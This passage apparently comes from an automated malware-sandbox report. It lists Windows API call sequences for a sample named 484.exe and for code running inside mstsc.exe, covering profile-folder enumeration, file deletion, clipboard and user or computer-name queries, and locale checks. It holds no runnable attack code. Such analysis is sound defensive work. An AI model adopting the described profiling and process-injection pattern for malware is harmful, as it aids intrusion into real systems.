Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_00061E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 13_2_00061E16 |
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_000622E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 13_2_000622E6 |
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_0006BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 13_2_0006BB40 |
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_0006DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 13_2_0006DDBF |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040C055 GetProcessHeap,GetProcessHeap,HeapAlloc,IsSystemResumeAutomatic,GetProcessHeap,HeapAlloc,GetClipboardSequenceNumber,GetModuleHandleA,GetProcAddress,GlobalMemoryStatusEx,GetSystemInfo,GetProcessHeap,HeapAlloc,GetDesktopWindow,RegOpenKeyW,HeapFree,GetProcessHeap,HeapAlloc,GetClipboardViewer,RegQueryValueExW,HeapFree,GetProcessHeap,HeapAlloc,CountClipboardFormats,StrStrIW,StrStrIW,Sleep,StrStrIW,GetProcessHeap,HeapFree,HeapFree,RegCloseKey,GetProcessHeap,HeapFree,Sleep,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 10_2_0040C055 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,ReleaseCapture,ExpandEnvironmentStringsW,GetShortPathNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,wsprintfW,GetProcessHeap,GetProcessHeap,HeapAlloc,RevertToSelf,CoInitializeEx,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,LoadLibraryA,GetProcAddress,GetLastError,Sleep,GetForegroundWindow,CoUninitialize,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 10_2_0040A0EE |
Source: C:\Windows\System32\mstsc.exe | Code function: GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,ReleaseCapture,ExpandEnvironmentStringsW,GetShortPathNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,wsprintfW,GetProcessHeap,GetProcessHeap,HeapAlloc,RevertToSelf,CoInitializeEx,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,LoadLibraryA,GetProcAddress,GetLastError,Sleep,GetForegroundWindow,CoUninitialize,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 13_2_0006A0EE |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040A98B GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetModuleHandleA,GetProcessHeap,GetUserNameA,GetProcessHeap,HeapAlloc,GetClipboardViewer,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,lstrcmpA,GetProcessHeap,GetComputerNameA,GetProcessHeap,HeapAlloc,GetCursor,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMessageExtraInfo,GetProcessHeap,GetProcessHeap,HeapAlloc,GetClipboardOwner,GetProcessHeap,GetProcessHeap,HeapAlloc,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,CountClipboardFormats,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMessageExtraInfo,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessWindowStation,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCaptur | 10_2_0040A98B |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040EFB9 EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,LoadLibraryA,GetProcAddress,GetCommandLineW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,IsSystemResumeAutomatic,GetProcessHeap,GetModuleHandleW,ExitProcess,GetCurrentProcess,GetVersion,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetActiveWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,StrStrIW,StrStrIW,StrStrIW,CreateThread,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,Sleep, | 10_2_0040EFB9 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, | 10_2_0042C882 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,GetLocaleInfoW, | 10_2_004244D8 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, | 10_2_0042C8E9 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, | 10_2_0042C796 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: __getptd,_TranslateName,_TranslateName,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,__itow_s, | 10_2_0042C925 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, | 10_2_0042C56A |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, | 10_2_0042C4C3 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: _strlen,EnumSystemLocalesA, | 10_2_0042C859 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, | 10_2_0042C3CE |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, | 10_1_0042C882 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,__freea, | 10_1_0042B9C8 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, | 10_1_004244D8 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, | 10_1_0042C8E9 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, | 10_1_0042C5C5 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, | 10_1_0042C796 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: __getptd,_TranslateName,_TranslateName,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,__itow_s, | 10_1_0042C925 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, | 10_1_0042C56A |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, | 10_1_0042C4C3 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: GetLocaleInfoA,___ascii_strnicmp, | 10_1_0042FC9F |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, | 10_1_0042C3CE |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Queries volume information: C:\ VolumeInformation |